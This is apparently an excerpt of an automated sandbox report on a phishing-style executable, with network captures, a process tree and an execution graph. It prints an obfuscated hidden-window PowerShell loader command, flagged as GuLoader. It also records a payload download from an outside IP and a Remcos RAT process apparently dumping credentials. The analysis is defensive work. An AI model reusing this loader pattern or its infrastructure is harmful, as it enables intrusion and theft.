                                                                      Nov 8, 2024 18:11:09.611236095 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611252069 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611262083 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611273050 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611283064 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611320972 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:09.611371994 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:09.611403942 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611413956 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611418962 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611427069 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611435890 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611448050 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611455917 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:09.611490011 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:09.611547947 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:09.931226015 CET8049980178.237.33.50192.168.2.5
                                                                      Nov 8, 2024 18:11:09.931296110 CET4998080192.168.2.5178.237.33.50
                                                                      Nov 8, 2024 18:11:11.315335035 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:11.320323944 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320350885 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320365906 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320386887 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320395947 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320404053 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320519924 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:11.320519924 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:11.320808887 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320826054 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320835114 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.320842981 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.325850964 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.325859070 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.325866938 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.325875998 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.325885057 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.325927019 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.326100111 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.367173910 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:11.372914076 CET460949981185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:11.372982979 CET499814609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:31.733557940 CET460949979185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:11:31.735290051 CET499794609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:11:31.740782022 CET460949979185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:12:01.883876085 CET460949979185.150.191.117192.168.2.5
                                                                      Nov 8, 2024 18:12:01.884322882 CET499794609192.168.2.5185.150.191.117
                                                                      Nov 8, 2024 18:12:01.889094114 CET460949979185.150.191.117192.168.2.5
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 8, 2024 18:11:07.909701109 CET6337353192.168.2.51.1.1.1
                                                                      Nov 8, 2024 18:11:07.919398069 CET53633731.1.1.1192.168.2.5
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 8, 2024 18:11:07.909701109 CET192.168.2.51.1.1.10x5a5eStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 8, 2024 18:11:07.919398069 CET1.1.1.1192.168.2.50x5a5eNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                      • 103.72.57.120
                                                                      • geoplugin.net
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.549950103.72.57.120802472C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 8, 2024 18:11:00.056351900 CET175OUTGET /TGIF/tspPz136.bin HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                      Host: 103.72.57.120
                                                                      Cache-Control: no-cache
                                                                      Nov 8, 2024 18:11:02.086581945 CET1236INHTTP/1.1 200 OK
                                                                      Date: Fri, 08 Nov 2024 17:11:01 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Fri, 08 Nov 2024 13:15:12 GMT
                                                                      ETag: "78c40-626668a80eff1"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 494656
                                                                      Content-Type: application/octet-stream
                                                                      Data Raw: 61 c8 3d ce ca 06 48 d1 03 db 43 d1 61 46 d0 c2 ca d6 cc ae 2a 6d 1f 2e 4c 81 dd 2a 8e 71 44 44 32 b9 87 59 b4 eb ca cb 4c e4 65 f9 c8 34 bd 99 a2 7f b4 da f8 e2 2f 5b f1 3e 7d b9 3a 54 03 e0 c7 67 4b 98 94 9e e3 b5 b6 e2 2d 94 1e 59 eb 06 1c 9b 09 e0 f9 a7 17 65 43 93 bc 48 b3 27 6b 17 c5 35 4f 2d 89 6c c5 52 b3 58 b9 87 62 ea 06 86 ce fd 9c d6 54 d5 7c b7 cf 3a 73 38 99 07 3a b0 21 8a d0 86 94 25 35 98 f1 fb 70 81 84 e0 3e d8 22 64 2a 35 f4 eb f2 e4 b0 d3 5c 0d 98 79 00 ba 8f 10 12 e0 40 88 e4 49 a4 d7 af a1 62 2c ab ed 90 c5 34 f8 a1 dc 4e 57 e3 ff 96 cc 8e c4 af c2 af 5a 7c c8 15 cd 6f cc 59 d3 f8 87 f8 0f f4 d5 a3 70 82 3b e4 ba d8 93 e3 fe bd 29 95 7c fe 6b 04 8f ad f4 9a a8 9c fa eb e3 2c 55 9b be 58 01 8f f4 9d f3 ae 77 59 46 51 38 46 77 29 d1 3b 3f 66 f9 2d 90 88 cc d9 df da 4e 28 58 51 70 70 ce 75 6b a6 f0 5d 45 8f df d5 dc d1 f7 0d e9 a0 c3 ce cf 06 e9 d5 3e b5 97 7e 99 92 b3 d9 77 ed 57 45 3e ff ce 7c b9 5a 2a 16 8d 9f 2a 32 78 24 29 9e 0b 86 da 9c 2f 9b 87 1e 2c bc 9d c1 35 32 e1 a2 e1 [TRUNCATED]
                                                                      Data Ascii: a=HCaF*m.L*qDD2YLe4/[>}:TgK-YeCH'k5O-lRXbT|:s8:!%5p>"d*5\y@Ib,4NWZ|oYp;)|k,UXwYFQ8Fw);?f-N(XQppuk]E>~wWE>|Z**2x$)/,52Tz.m^pahO-7btT0G`:s*4u1,pX?""])ygj[qKh:oKv<`ZQdq%@vf*g5t` ^.$+uR9Y HxZH $Cc@"49Z8~{.{2cN/f}rO?sJo1zJedkl6@R.WAO\N1#d:J"HA6cW=xb{4QC-.x+j.\w>+S(7/T7TJAQE+"b&.o |?),jy_c$) L!Kw`T'zRel,EvS=e#y>SI,{gGuSg,a7%F1^r3M
                                                                      Nov 8, 2024 18:11:02.086613894 CET212INData Raw: 92 88 c5 20 94 2e 46 e2 c1 92 5e a1 74 ea d4 92 31 e0 d7 69 ad d6 98 df 7c cd 12 66 4a 03 b6 d1 7d b7 1b e4 0c 10 6a 96 da e5 28 6b 62 d9 6a 0e 19 88 21 c9 5a da 0f a6 fc dd 7b 7b 57 07 2f 62 42 11 64 07 31 43 f2 e8 23 e7 2f 90 98 8b 11 15 5d e7
                                                                      Data Ascii: .F^t1i|fJ}j(kbj!Z{{W/bBd1C#/]/4[mJ5vob+CC^YM+#c?`iy<8{@IN-Of'.S)L@!dadVWY%}q[`
                                                                      Nov 8, 2024 18:11:02.086632013 CET1236INData Raw: 18 5f 84 ff c7 08 37 26 a1 2d 61 a3 58 68 fc 35 a6 0e c8 c2 25 ce 85 dd 86 c8 a2 9d fd 94 79 7b 55 b2 b5 71 00 2e 2b 88 34 57 cd 73 6a e1 bc d2 e2 34 82 9f 6b 16 a0 3d b3 5a d0 59 c0 23 b8 47 45 57 ce 11 22 af b3 64 87 a6 6c 00 5a 8e d6 46 95 6f
                                                                      Data Ascii: _7&-aXh5%y{Uq.+4Wsj4k=ZY#GEW"dlZFo6LF.K 6U.0X5\ED`{J#],NiIb< "ju`5pMkmz-aR0'U|j48i/D@qx*
                                                                      Nov 8, 2024 18:11:02.086659908 CET1236INData Raw: 63 30 b2 5f eb 19 8a 34 d2 28 a8 ad a2 ad 7c 9b 1a d8 05 9e eb 32 eb 95 d0 d8 b8 02 97 37 2f b2 30 ed 43 62 36 be e4 bd 20 42 3b 23 6a 8b 61 85 78 a1 09 08 2e 38 5c ed f1 54 6f 1f 26 21 fb 38 b7 64 59 19 de c5 34 71 e7 f3 01 44 7d e7 cc f8 04 d2
                                                                      Data Ascii: c0_4(|27/0Cb6 B;#jax.8\To&!8dY4qD}lE$=g 1o2q,0d\YdXt,=D?VYN5bW>G})4BD!Qv-OtAyv9as#O%OXZ
                                                                      Nov 8, 2024 18:11:02.086683035 CET1236INData Raw: 9a bb 14 58 f0 3d 44 96 43 4e 69 60 0b cc 6e 93 a2 3d 9c 7e e0 1a bb 2e 86 5d 4c 2d 1a 60 36 4d 80 56 ad b0 b6 d4 45 00 2e 68 c7 c5 40 49 7b f2 fc e9 25 4a 49 3b 9b 86 fc 73 54 27 b9 c5 d0 57 14 90 0e 58 43 0b 1f 1b f2 20 6e 9e 21 64 d5 67 c1 7c
                                                                      Data Ascii: X=DCNi`n=~.]L-`6MVE.h@I{%JI;sT'WXC n!dg|r#(iv4?elxHZxje6c?4jWFvRW7KUW{[0+wZ#:(yk%7MiC(d-MG;Na32V-oNc<
                                                                      Nov 8, 2024 18:11:02.086749077 CET636INData Raw: 98 98 e1 b8 f5 4f 93 9d 8a ed 1b 0e b7 a0 71 10 cc a7 bf a6 01 da c7 0c 28 cb 1e 5d 4d 92 4e 32 f3 df fb 37 5d 6c 3f c5 73 54 1f 18 61 23 f9 d7 c7 80 ca 05 18 05 be a2 bf 4a 6b 5f e6 38 13 11 63 80 c1 b4 46 b2 9b 47 e9 2e 67 8d 2f 60 d1 8b 80 36
                                                                      Data Ascii: Oq(]MN27]l?sTa#Jk_8cFG.g/`6nWDB`QyC=(J4Ax&t)9=^J<(b%hU(#?3*:E7j?#D{dn,]\ ,Q$@\-(*k7S
                                                                      Nov 8, 2024 18:11:02.302337885 CET1236INData Raw: 1c b5 ac ac 79 ec fd 3b 98 6f 59 15 2e b8 75 58 f2 82 3a a3 98 ef 0d 97 44 e6 23 f8 9f 15 82 c2 5f 18 b9 44 cb 16 e1 e2 32 af 07 66 32 c6 4c ae 72 4b f1 b4 05 9a a2 27 20 77 c0 93 0d 09 9c 18 e6 45 81 4c eb 5b c2 41 e6 8b ab ef 9d 65 20 e4 e8 9e
                                                                      Data Ascii: y;oY.uX:D#_D2f2LrK' wEL[Ae {#BtoQRS}RnT`lFPp@7}6Z8yqR`MC+1Hro\rHT?z?"E6NI&t#.4OE;Kb
                                                                      Nov 8, 2024 18:11:02.302361012 CET212INData Raw: 84 6e b0 42 e9 ac fe 4a 36 3f 76 0c 40 30 ea 75 48 ba a2 98 1e 4a c7 e4 bb c2 93 88 59 80 92 36 a9 ca 54 a6 e6 49 c5 b0 0d bf 27 b7 37 d4 93 a0 f8 8a 48 2d b8 cd 66 77 6e c5 90 48 7d 8a ed 62 6f 34 f7 62 9e 5a 1a 3b 93 0b 2f c1 3c 29 1d 46 9e 64
                                                                      Data Ascii: nBJ6?v@0uHJY6TI'7H-fwnH}bo4bZ;/<)FdQmH:K\nEo'AHMPVoy#423-nWHSuf,F`0`C~.hjEGQ'yr/P8_<qT/6!31Tn8F[A
                                                                      Nov 8, 2024 18:11:02.302371979 CET1236INData Raw: c5 ef f9 ba e7 f5 32 1b ee 81 d7 e9 18 7a 73 19 8d 69 59 2b 70 3c 20 29 8d c3 c2 d6 c0 e2 ba d7 fb d1 c1 6f ce d9 88 35 58 57 ad 30 7f c7 b4 2c 0f b8 12 83 85 8d f4 40 da 64 44 84 cc fc dc 52 82 13 fb 2c bd 9d a2 77 24 94 af 5d e8 30 bd e9 a5 62
                                                                      Data Ascii: 2zsiY+p< )o5XW0,@dDR,w$]0bji/"K*A&d3cB[hS-E:<dD%).80X%cNr#~P`0L+Em0@#po8fxQ.;/E
                                                                      Nov 8, 2024 18:11:02.302387953 CET1236INData Raw: d4 30 3e 0f 53 fb 64 b2 55 ec 37 cd 0f 23 4a 26 4e dd bc d1 5f 80 62 42 15 38 27 68 81 f0 06 43 fc 2b cd 90 85 da 41 c0 14 06 45 e5 90 61 1b ee 03 80 7f e7 0c e8 bc ba f1 2f d9 2f 62 7d 72 10 99 99 b4 96 bc 78 df 12 20 c2 05 cf ba 37 27 4f 9b d8
                                                                      Data Ascii: 0>SdU7#J&N_bB8'hC+AEa//b}rx 7'OnQlo;4H%X-4Lf`uja/"H>V^*:6c.zf.7l_ D*C-m}|\{;/qF{MQ9}}+$I?i<od
                                                                      Nov 8, 2024 18:11:02.302401066 CET1236INData Raw: 39 d1 54 9d e1 69 34 ce 5f a6 09 29 ef 26 78 f5 1f 32 18 16 13 d4 ed 22 09 fd 30 c8 4e 2e 4d 0c 8f 9c 75 6f 0a 42 da 22 90 9f 09 f3 4a f6 31 9a 51 d1 d4 a6 23 6f c6 71 28 54 67 f9 2f 16 d4 ad ec a4 9f f5 b5 26 d3 e8 2e cd 1b c8 4b f4 97 eb f9 52
                                                                      Data Ascii: 9Ti4_)&x2"0N.MuoB"J1Q#oq(Tg/&.KRS2*/,i*1X!iQ|5HFGpa&V@*w_\D|jIhA5Z|}=*D<$h@'[p2/


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.549980178.237.33.50802472C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 8, 2024 18:11:07.931137085 CET71OUTGET /json.gp HTTP/1.1
                                                                      Host: geoplugin.net
                                                                      Cache-Control: no-cache
                                                                      Nov 8, 2024 18:11:08.806047916 CET1165INHTTP/1.1 200 OK
                                                                      date: Fri, 08 Nov 2024 17:11:08 GMT
                                                                      server: Apache
                                                                      content-length: 957
                                                                      content-type: application/json; charset=utf-8
                                                                      cache-control: public, max-age=300
                                                                      access-control-allow-origin: *
                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                      Data Ascii: { "geoplugin_request":"173.254.250.90", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:12:09:52
                                                                      Start date:08/11/2024
                                                                      Path:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe"
                                                                      Imagebase:0x400000
                                                                      File size:718'232 bytes
                                                                      MD5 hash:74436E65E2A2612FB6A127990D81F44D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:12:09:56
                                                                      Start date:08/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Computergrej.Alu';$Radiotelegrammets=$Rodfstets.SubString(22603,3);.$Radiotelegrammets($Rodfstets)"
                                                                      Imagebase:0x50000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2574553640.000000000B266000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:12:09:56
                                                                      Start date:08/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:12:10:46
                                                                      Start date:08/11/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Hedgiest165.exe"
                                                                      Imagebase:0x400000
                                                                      File size:718'232 bytes
                                                                      MD5 hash:74436E65E2A2612FB6A127990D81F44D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 3%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:7
                                                                      Start time:12:11:08
                                                                      Start date:08/11/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\fwvclzunqobhontovwjupvveekchrmo"
                                                                      Imagebase:0x400000
                                                                      File size:718'232 bytes
                                                                      MD5 hash:74436E65E2A2612FB6A127990D81F44D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:12:11:08
                                                                      Start date:08/11/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\pybvmrepextuythsmgwvzaqvnquqkxftlb"
                                                                      Imagebase:0x400000
                                                                      File size:718'232 bytes
                                                                      MD5 hash:74436E65E2A2612FB6A127990D81F44D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:12:11:08
                                                                      Start date:08/11/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\zsggmk"
                                                                      Imagebase:0x400000
                                                                      File size:718'232 bytes
                                                                      MD5 hash:74436E65E2A2612FB6A127990D81F44D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:19%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:16.9%
                                                                        Total number of Nodes:1375
                                                                        Total number of Limit Nodes:28
                                                                        execution_graph 3200 4015c1 3220 402d3e 3200->3220 3204 401631 3206 401663 3204->3206 3207 401636 3204->3207 3210 401423 24 API calls 3206->3210 3236 401423 3207->3236 3216 40165b 3210->3216 3214 40164a SetCurrentDirectoryW 3214->3216 3215 4015d1 3215->3204 3217 4015fa 3215->3217 3218 401617 GetFileAttributesW 3215->3218 3232 405cdd 3215->3232 3240 4059ac 3215->3240 3248 40598f CreateDirectoryW 3215->3248 3217->3215 3243 405912 CreateDirectoryW 3217->3243 3218->3215 3221 402d4a 3220->3221 3251 406418 3221->3251 3224 4015c8 3226 405d5b CharNextW CharNextW 3224->3226 3227 405d78 3226->3227 3229 405d8a 3226->3229 3228 405d85 CharNextW 3227->3228 3227->3229 3231 405dae 3228->3231 3230 405cdd CharNextW 3229->3230 3229->3231 3230->3229 3231->3215 3233 405ce3 3232->3233 3234 405cf9 3233->3234 3235 405cea CharNextW 3233->3235 3234->3215 3235->3233 3289 405443 3236->3289 3239 4063db lstrcpynW 3239->3214 3300 4067d0 GetModuleHandleA 3240->3300 3244 405963 GetLastError 3243->3244 3245 40595f 3243->3245 3244->3245 3246 405972 SetFileSecurityW 3244->3246 3245->3217 3246->3245 3247 405988 GetLastError 3246->3247 3247->3245 3249 4059a3 GetLastError 3248->3249 3250 40599f 3248->3250 3249->3250 3250->3215 3263 406425 3251->3263 3252 406670 3253 402d6b 3252->3253 3284 4063db lstrcpynW 3252->3284 3253->3224 3268 40668a 3253->3268 3255 40663e lstrlenW 3255->3263 3258 406418 10 API calls 3258->3255 3259 406553 GetSystemDirectoryW 3259->3263 3261 406566 GetWindowsDirectoryW 3261->3263 3262 40668a 5 API calls 3262->3263 3263->3252 3263->3255 3263->3258 3263->3259 3263->3261 3263->3262 3264 40659a SHGetSpecialFolderLocation 3263->3264 3265 406418 10 API calls 3263->3265 3266 4065e1 lstrcatW 3263->3266 3277 4062a9 3263->3277 3282 406322 wsprintfW 3263->3282 3283 4063db lstrcpynW 3263->3283 3264->3263 3267 4065b2 SHGetPathFromIDListW CoTaskMemFree 3264->3267 3265->3263 3266->3263 3267->3263 3274 406697 3268->3274 3269 406712 CharPrevW 3270 40670d 3269->3270 3270->3269 3272 406733 3270->3272 3271 406700 CharNextW 3271->3270 3271->3274 3272->3224 3273 405cdd CharNextW 3273->3274 3274->3270 3274->3271 3274->3273 3275 4066ec CharNextW 3274->3275 3276 4066fb CharNextW 3274->3276 3275->3274 3276->3271 3285 406248 3277->3285 3280 40630d 3280->3263 3281 4062dd RegQueryValueExW RegCloseKey 3281->3280 3282->3263 3283->3263 3284->3253 3286 406257 3285->3286 3287 406260 RegOpenKeyExW 3286->3287 3288 40625b 3286->3288 3287->3288 3288->3280 3288->3281 3290 40545e 3289->3290 3291 401431 3289->3291 3292 40547a lstrlenW 3290->3292 3293 406418 17 API calls 3290->3293 3291->3239 3294 4054a3 3292->3294 3295 405488 lstrlenW 3292->3295 3293->3292 3297 4054b6 3294->3297 3298 4054a9 SetWindowTextW 3294->3298 3295->3291 3296 40549a lstrcatW 3295->3296 3296->3294 3297->3291 3299 4054bc SendMessageW SendMessageW SendMessageW 3297->3299 3298->3297 3299->3291 3301 4067f6 GetProcAddress 3300->3301 3302 4067ec 3300->3302 3303 4059b3 3301->3303 3306 406760 GetSystemDirectoryW 3302->3306 3303->3215 3305 4067f2 3305->3301 3305->3303 3307 406782 wsprintfW LoadLibraryExW 3306->3307 3307->3305 4023 402a42 4037 402d1c 4023->4037 4025 402a48 4026 402a88 4025->4026 4027 402a6f 4025->4027 4032 402925 4025->4032 4028 402aa2 4026->4028 4029 402a92 4026->4029 4030 402a74 4027->4030 4031 402a85 4027->4031 4034 406418 17 API calls 4028->4034 4033 402d1c 17 API calls 4029->4033 4040 4063db lstrcpynW 4030->4040 4041 406322 wsprintfW 4031->4041 4033->4032 4034->4032 4038 406418 17 API calls 4037->4038 4039 402d31 4038->4039 4039->4025 4040->4032 4041->4032 4042 401c43 4043 402d1c 17 API calls 4042->4043 4044 401c4a 4043->4044 4045 402d1c 17 API calls 4044->4045 4046 401c57 4045->4046 4047 401c6c 4046->4047 4048 402d3e 17 API calls 4046->4048 4049 401c7c 4047->4049 4050 402d3e 17 API calls 4047->4050 4048->4047 4051 401cd3 4049->4051 4052 401c87 4049->4052 4050->4049 4053 402d3e 17 API calls 4051->4053 4054 402d1c 17 API calls 4052->4054 4055 401cd8 4053->4055 4056 401c8c 4054->4056 4057 402d3e 17 API calls 4055->4057 4058 402d1c 17 API calls 4056->4058 4059 401ce1 FindWindowExW 4057->4059 4060 401c98 4058->4060 4063 401d03 4059->4063 4061 401cc3 SendMessageW 4060->4061 4062 401ca5 SendMessageTimeoutW 4060->4062 4061->4063 4062->4063 4064 402b43 4065 4067d0 5 API calls 4064->4065 4066 402b4a 4065->4066 4067 402d3e 17 API calls 4066->4067 4068 402b53 4067->4068 4069 402b57 IIDFromString 4068->4069 4071 402b8e 4068->4071 4070 402b66 4069->4070 4069->4071 4070->4071 4074 4063db lstrcpynW 4070->4074 4073 402b83 CoTaskMemFree 4073->4071 4074->4073 4082 402947 4083 402d3e 17 API calls 4082->4083 4084 402955 4083->4084 4085 40296b 4084->4085 4086 402d3e 17 API calls 4084->4086 4087 405eac 2 API calls 4085->4087 4086->4085 4088 402971 4087->4088 4110 405ed1 GetFileAttributesW CreateFileW 4088->4110 4090 40297e 4091 402a21 4090->4091 4092 40298a GlobalAlloc 4090->4092 4095 402a29 DeleteFileW 4091->4095 4096 402a3c 4091->4096 4093 4029a3 4092->4093 4094 402a18 CloseHandle 4092->4094 4111 403447 SetFilePointer 4093->4111 4094->4091 4095->4096 4098 4029a9 4099 403431 ReadFile 4098->4099 4100 4029b2 GlobalAlloc 4099->4100 4101 4029c2 4100->4101 4102 4029f6 4100->4102 4103 40324c 35 API calls 4101->4103 4104 405f83 WriteFile 4102->4104 4109 4029cf 4103->4109 4105 402a02 GlobalFree 4104->4105 4106 40324c 35 API calls 4105->4106 4107 402a15 4106->4107 4107->4094 4108 4029ed GlobalFree 4108->4102 4109->4108 4110->4090 4111->4098 4115 4016cc 4116 402d3e 17 API calls 